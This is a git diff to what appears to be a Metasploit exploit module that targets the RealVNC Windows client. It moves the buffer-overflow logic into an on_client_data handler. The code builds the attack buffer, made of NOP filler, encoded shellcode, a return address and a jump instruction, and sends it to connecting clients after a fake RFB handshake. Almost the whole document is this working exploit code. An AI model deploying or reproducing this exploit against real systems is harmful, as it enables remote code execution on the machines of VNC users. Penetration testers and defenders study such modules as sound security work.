diff --git a/modules/exploits/windows/vnc/realvnc_client.rb b/modules/exploits/windows/vnc/realvnc_client.rb
index d5ab68a95c..c117e5741a 100644
--- a/modules/exploits/windows/vnc/realvnc_client.rb
+++ b/modules/exploits/windows/vnc/realvnc_client.rb
@@ -47,19 +47,20 @@ class Exploits::Windows::Vnc::Realvnc_Client < Exploit::Remote
 end
 def on_client_connect(client)
- return if ((p = regenerate_payload(client)) == nil)
-
- filler = make_nops(993 - payload.encoded.length)
 rfb = "RFB 003.003\n"
+ client.put(rfb)
+ end
+
+ def on_client_data(client)
+ return if ((p = regenerate_payload(client)) == nil)
+
+ filler = make_nops(993 - payload.encoded.length)
+
 sploit = "\x00\x00\x00\x00\x00\x00\x04\x06" + filler + payload.encoded
 sploit << [target.ret].pack('V') + make_nops(10) + [0xe8, -457].pack('CV')
- sploit << Rex::Text.rand_text_english(200)
-
- client.put(rfb)
-
- on_client_data(16)
+ sploit << rand_text_english(200)
 print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
 client.put(sploit)